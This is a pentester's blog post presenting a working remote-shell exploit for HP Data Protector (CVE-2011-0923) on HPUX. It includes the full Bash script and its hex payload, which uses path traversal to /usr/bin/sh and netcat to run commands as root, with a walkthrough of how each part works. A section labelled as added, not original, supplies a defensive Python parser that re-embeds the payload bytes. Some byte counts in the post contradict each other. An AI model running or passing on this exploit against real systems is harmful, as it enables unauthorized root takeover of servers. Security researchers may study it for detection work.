HP Data Protector Remote Shell for HPUX

In many pentests that I have done, HPUX is one of the more common UNIX OSes that I find. It is a strong operating system running on robust hardware, and when I got to know the Lights Out functionality I just fell in love with it. Although many companies use it to run the core of their business, I have found that they don't pay much attention to its security, so it's common to find production servers without patches, or even running applications over insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security, it created the Bastille project for HPUX. I have used it to harden servers and I can say that it's great! You have to be really careful, because it closes a lot of stuff and it may, no sorry, it will break the connectivity with your oldest applications (by the way, it moves the user password hashes to the /tcb/files/auth/ folder ;) ). This doesn't mean you can just run out tomorrow, apply Bastille on your servers and forget about them... YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working on a pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed; it wasn't looking so good. Looking around I found that Data Protector has this nasty vulnerability and that fdisk had created a PoC for this zero day, but for Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project, which you can see on his blog) the server was compromised with root.... w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don't own. You can also download it from my Hacking Projects section.


#!/bin/bash
# Exploit Title: HP Data Protector Remote Shell for HPUX
# Date: 2011-08-02
# Author: Adrian Puente Z.
# Software Link: http://www8.hp.com/us/en/software/software-product.html?compURI=tcm:245-936920&pageTitle=data-protector
# Version: 0.9
# Tested on: HPUX
# CVE: CVE-2011-0923
# Notes: ZDI-11-055
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
#
# Powered by Hackarandas www.hackarandas.com
# Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks
# Lots of thanks to David Llorens (@c4an) for all the help.
# Ported to HPUX from fdisk's (@fdiskyou) Windows version.
# Windows version: http://www.exploit-db.com/exploits/17339/
#
# Shouts to shellhellboy, r3x, r0d00m, etlow,
# psymera, nitr0us and ppl in #mendozaaaa
#

[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)\n" && exit 0

HOST=`echo ${@} | awk '{print $1}'`
PORT=`echo ${@} | awk '{print $2}'`
CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'`
SC=""
SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
SHELLCODE=${SC}
( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

This script is written in Bash and runs on any Linux, such as BackTrack, or on Windows under Cygwin. This is how it works:

The shellcode is 168 bytes and is sent directly to the port. The first 8 bytes of this 104-byte part of the shellcode are protocol framing, where we use the flag "C 20" to tell Data Protector (I found that if we manipulate this value other things can be accomplished, even writing directly to /) to perform the vulnerable function that accepts remote connections and executes files within its local bin directory.


"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
"\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

but if we use the directory path traversal technique we can execute any binary in the file system. The next part was tricky: I could execute any command, but I was unable to pass arguments directly to it. After some debugging I found I could spawn /usr/bin/sh, closing the message with some null bytes to complete the 168 bytes, and if I concatenate the command to execute after it, it is passed directly to the shell and executed with the user's environment variables, in this case root's, and the output is returned to us.


"\x20\x2e\x2e\x2f\x2e\x2e\x2f"
"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"

So at the end I get this to work doing this:


( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

Netcat transports the shellcode to the port and returns the output. It simply works.
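As an added example (not part of the original post and not the exploit's own code), the request layout described above can be decoded from the wire and checked for the two things a network sensor or a log reviewer on the Data Protector side would want to flag: the "C 20" exec selector and a parent-directory sequence in the path field that escapes the local bin directory. The field layout (a 4-byte big-endian length, then fields that each start with a space and end with a NUL byte, followed by NUL padding) is inferred from the bytes printed above and is an assumption; the sample bytes are the post's own request, embedded here only as offline test input.

```python
import struct

# Sample input: the request bytes printed in the post, copied as a Python
# bytes literal so the parser can be exercised offline (test data only).
SAMPLE_REQUEST = (
    b"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
    b"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
    b"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
    b"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
    b"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
    b"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
    b"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
    b"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
    b"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
)

# The "C 20" flag the post identifies as the selector for the exec function.
EXEC_SELECTOR = ("C", "20")


def parse_request(data: bytes) -> dict:
    """Split one request into its fields.

    Assumed layout (inferred from the bytes in the post): a 4-byte big-endian
    length header, then fields that each begin with a space and end with a
    NUL byte, followed by NUL padding up to the full message size.
    """
    if len(data) < 4:
        raise ValueError("request shorter than the 4-byte length header")
    declared_len = struct.unpack(">I", data[:4])[0]
    body = data[4:]
    fields = [
        raw.lstrip(b" ").decode("latin-1")
        for raw in body.split(b"\x00")
        if raw  # drop the empty strings produced by the trailing NUL padding
    ]
    return {"declared_len": declared_len, "body_len": len(body), "fields": fields}


def assess_request(data: bytes) -> list:
    """Return human-readable findings for one request (empty list = nothing seen)."""
    req = parse_request(data)
    fields = req["fields"]
    findings = []
    if len(fields) > 6 and (fields[5], fields[6]) == EXEC_SELECTOR:
        findings.append("exec request selected (flag C 20)")
    for idx, value in enumerate(fields):
        # Any parent-directory component in the executable name escapes the
        # local bin directory the service is supposed to be restricted to.
        if "../" in value or "..\\" in value:
            findings.append(f"path traversal in field {idx}: {value!r}")
    return findings


if __name__ == "__main__":
    for finding in assess_request(SAMPLE_REQUEST):
        print(finding)
```

Run stand-alone it prints one line for the exec selector and one for the traversal path; the same two checks can be applied to a pcap of the Data Protector port or to a copy of the request reconstructed from the service's own logs. The length header is parsed and reported but not used as a finding, because the post does not say whether it counts the header itself.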

So special thanks to fdisk for the PoC and to David Llorens for the useful brainstorming; he also ported this tool to the Metasploit Project, which you can see on his blog.

Adrian Puente Z.
